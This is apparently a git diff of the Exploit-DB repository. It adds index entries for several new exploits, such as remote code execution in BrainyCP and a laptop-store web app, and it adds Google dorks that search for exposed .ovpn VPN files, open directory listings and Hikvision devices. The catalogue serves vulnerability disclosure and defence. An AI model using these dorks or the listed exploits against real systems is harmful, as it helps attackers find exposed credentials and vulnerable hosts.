Harris",dos,hardware,,2009-10-13,2014-05-09,1,,,,,,https://www.securityfocus.com/bid/36659/info +51356,exploits/hardware/dos/51356.sh,"Paradox Security Systems IPR512 - Denial Of Service",2023-04-10,"Giorgi Dograshvili",dos,hardware,,2023-04-10,2023-04-10,0,CVE-2023-24709,,,,, 23876,exploits/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow",2004-03-24,"Luigi Auriemma",dos,hardware,,2004-03-24,2013-01-09,1,CVE-2004-1854;OSVDB-4550,,,,,https://www.securityfocus.com/bid/9969/info 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,,2018-08-13,2018-08-13,0,,,,,, 2156,exploits/hardware/dos/2156.c,"PocketPC Mms Composer - 'WAPPush' Denial of Service",2006-08-09,"Collin Mulliner",dos,hardware,,2006-08-08,,1,,,,,, @@ -3934,7 +3936,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41480,exploits/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",remote,hardware,,2017-03-01,2017-03-01,0,CVE-2017-6351,,,,, 19402,exploits/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Privilege Escalation",2012-06-26,"Wolfgang Borst",remote,hardware,,2012-06-26,2012-06-26,0,OSVDB-83404;OSVDB-83403,,,,, 23545,exploits/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 - Login Page Source Code Disclosure",2004-01-15,Procheckup,remote,hardware,,2004-01-15,2012-12-20,1,OSVDB-13281,,,,,https://www.securityfocus.com/bid/9431/info -51311,exploits/hardware/remote/51311.py,"WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE",2023-04-06,"Momen Eldawakhly",remote,hardware,,2023-04-06,2023-04-06,0,,,,,, +51311,exploits/hardware/remote/51311.py,"WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE",2023-04-06,"Momen Eldawakhly",remote,hardware,,2023-04-06,2023-04-10,0,CVE-2023-27826,,,,, 43142,exploits/hardware/remote/43142.c,"Wireless IP Camera (P2P) WIFICAM - Remote Code Execution",2017-03-08,PierreKimSec,remote,hardware,80,2017-11-14,2019-03-07,0,CVE-2017-8225;CVE-2017-8224;CVE-2017-8223;CVE-2017-8222;CVE-2017-8221,,,,,https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html 31758,exploits/hardware/remote/31758.py,"WRT120N 1.0.0.7 - Remote Stack Overflow",2014-02-19,"Craig Heffner",remote,hardware,80,2014-02-19,2014-02-19,0,OSVDB-103521,,,,, 36866,exploits/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - '/webconfig/wan/confirm.html/confirm?pvcName' Cross-Site Scripting",2012-02-21,Busindre,remote,hardware,,2012-02-21,2015-04-30,1,OSVDB-79823;CVE-2012-5322,,,,,https://www.securityfocus.com/bid/52098/info @@ -10306,6 +10308,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info 49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",2021-01-28,"Justin Steven",local,multiple,,2021-01-28,2021-01-28,0,CVE-2020-7384,,,,, +51359,exploits/multiple/local/51359.txt,"Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing",2023-04-10,nu11secur1ty,local,multiple,,2023-04-10,2023-04-10,0,CVE-2023-24892,,,,, 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,,2020-03-18,2020-03-18,0,,,,,,https://github.com/doyensec/VSCode_PoC_Oct2019/tree/19f09e5cf4bfcad500f9238748fb34d07284fa4f 44266,exploits/multiple/local/44266.html,"Mozilla Firefox - Address Bar Spoofing",2017-04-14,649,local,multiple,,2018-03-09,2018-03-09,0,CVE-2017-5415,,,,,https://github.com/649/CVE-2017-5415/tree/209b7ae6882a18ae51b1222a68c040a3bc9a8bc5 10544,exploits/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",local,multiple,,2009-12-17,,1,CVE-2009-1839;OSVDB-55163,,,,, @@ -14963,6 +14966,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9837,exploits/php/webapps/9837.txt,"BPStudent 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",webapps,php,,2009-09-21,,1,,,,,, 11896,exploits/php/webapps/11896.txt,"BPTutors Tutoring site script - Cross-Site Request Forgery (Add Admin)",2010-03-26,bi0,webapps,php,,2010-03-25,,0,OSVDB-63604,,,,, 3162,exploits/php/webapps/3162.txt,"Bradabra 2.0.5 - '/include/includes.php' Remote File Inclusion",2007-01-20,GoLd_M,webapps,php,,2007-01-19,,1,OSVDB-31604;CVE-2007-0500,,,,, +51357,exploits/php/webapps/51357.py,"BrainyCP V1.0 - Remote Code Execution",2023-04-10,"Ahmet Ümit BAYRAM",webapps,php,,2023-04-10,2023-04-10,0,,,,,, 2751,exploits/php/webapps/2751.py,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",webapps,php,,2006-11-09,2016-12-13,1,OSVDB-30316;CVE-2006-5889,,,,http://www.exploit-db.comBB1.3.1.zip, 6023,exploits/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",webapps,php,,2008-07-07,2016-12-14,1,OSVDB-46863;CVE-2008-6911,,,,http://www.exploit-db.comBB2.1.0.1.zip, 17435,exploits/php/webapps/17435.txt,"BrewBlogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",webapps,php,,2011-06-23,2016-12-13,1,OSVDB-73263;OSVDB-73262;OSVDB-73261,,,,http://www.exploit-db.comBrewBlogger2.3.2.tar.gz,http://itsecuritysolutions.org/2011-06-23_BrewBlogger_2.3.2_multiple_security_vulnerabilities/ @@ -24537,6 +24541,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,,2020-05-07,2020-05-07,0,,,,,, 48426,exploits/php/webapps/48426.txt,"Online Clothing Store 1.0 - Persistent Cross-Site Scripting",2020-05-06,"Sushant Kamble",webapps,php,,2020-05-06,2020-05-06,0,,,,,, 11774,exploits/php/webapps/11774.txt,"Online Community CMS by I-net - SQL Injection",2010-03-16,"Th3 RDX",webapps,php,,2010-03-15,,1,,,,,, +51358,exploits/php/webapps/51358.py,"Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)",2023-04-10,"Matisse Beckandt",webapps,php,,2023-04-10,2023-04-10,0,CVE-2023-1826,,,,, 32937,exploits/php/webapps/32937.txt,"Online Contact Manager 3.0 - 'delete.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4926;OSVDB-53820,,,,,https://www.securityfocus.com/bid/34626/info 32936,exploits/php/webapps/32936.txt,"Online Contact Manager 3.0 - 'edit.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4926;OSVDB-53819,,,,,https://www.securityfocus.com/bid/34626/info 32935,exploits/php/webapps/32935.txt,"Online Contact Manager 3.0 - 'email.php?id' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4926;OSVDB-53818,,,,,https://www.securityfocus.com/bid/34626/info @@ -34690,6 +34695,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1624,exploits/tru64/local/1624.pl,"Tru64 UNIX 5.0 (Rev. 910) - rdist NLSPATH Buffer Overflow",2006-03-29,"Kevin Finisterre",local,tru64,,2006-03-28,2017-01-24,1,,,,,, 4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,remote,tru64,,2007-06-03,,1,OSVDB-36204;CVE-2007-2791,,,,, 50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,,2021-06-15,2021-06-15,0,,,,,, +51354,exploits/typescript/webapps/51354.txt,"ever gauzy v0.281.9 - JWT weak HMAC secret",2023-04-10,nu11secur1ty,webapps,typescript,,2023-04-10,2023-04-10,0,,,,,, 51073,exploits/typescript/webapps/51073.txt,"Grafana <=6.2.4 - HTML Injection",2023-03-27,"SimranJeet Singh",webapps,typescript,,2023-03-27,2023-03-27,0,CVE-2019-13068,,,,, 19817,exploits/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",dos,ultrix,,2000-03-16,2012-07-14,1,OSVDB-83869,,,,,https://www.securityfocus.com/bid/1071/info 698,exploits/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer BrÃ¥nemyr",local,ultrix,,2004-12-19,,1,OSVDB-12626;CVE-2004-1326,,,,, diff --git a/ghdb.xml b/ghdb.xml index f587ff0cb..21492e9b8 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -48716,6 +48716,21 @@ Author : aye_robot 2017-10-05 anonymous + + 8149 + https://www.exploit-db.com/ghdb/8149 + Files Containing Juicy Info + inurl:".ir/" intext:"index of /" ".ovpn" + # Google Dork: inurl:".ir/" intext:"index of /" ".ovpn" +# Files Containing Juicy Info +# Date:10/04/2023 +# Exploit Author: Azar A. Nariman + inurl:".ir/" intext:"index of /" ".ovpn" + https://www.google.com/search?q=inurl:".ir/" intext:"index of /" ".ovpn" + + 2023-04-10 + Azar A. Nariman + 5576 https://www.exploit-db.com/ghdb/5576 @@ -49229,6 +49244,21 @@ ManhNho 2018-02-20 ManhNho + + 8148 + https://www.exploit-db.com/ghdb/8148 + Files Containing Juicy Info + inurl:":8080/" intext:"index of /" "win64" -LiteSpeed + # Google Dork: inurl:":8080/" intext:"index of /" "win64" -LiteSpeed +# Files Containing Juicy Info +# Date:10/04/2023 +# Exploit Author: Azar A. Nariman + inurl:":8080/" intext:"index of /" "win64" -LiteSpeed + https://www.google.com/search?q=inurl:":8080/" intext:"index of /" "win64" -LiteSpeed + + 2023-04-10 + Azar A. Nariman + 4821 https://www.exploit-db.com/ghdb/4821 @@ -99974,6 +100004,22 @@ peace 2016-04-26 anonymous + + 8147 + https://www.exploit-db.com/ghdb/8147 + Various Online Devices + =?UTF-8?Q?intext:"Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product."_hikvision?= + # Google Dork: intext:"Please respect other people’s privacy and +rights when using product." hikvision +# Various Online Devices +# Date:10/04/2023 +# Exploit Author: Zayed AlJaberi + =?UTF-8?Q?intext:"Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product."_hikvision?= + https://www.google.com/search?q==?UTF-8?Q?intext:"Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product."_hikvision?= + + 2023-04-10 + Zayed AlJaberi + 516 https://www.exploit-db.com/ghdb/516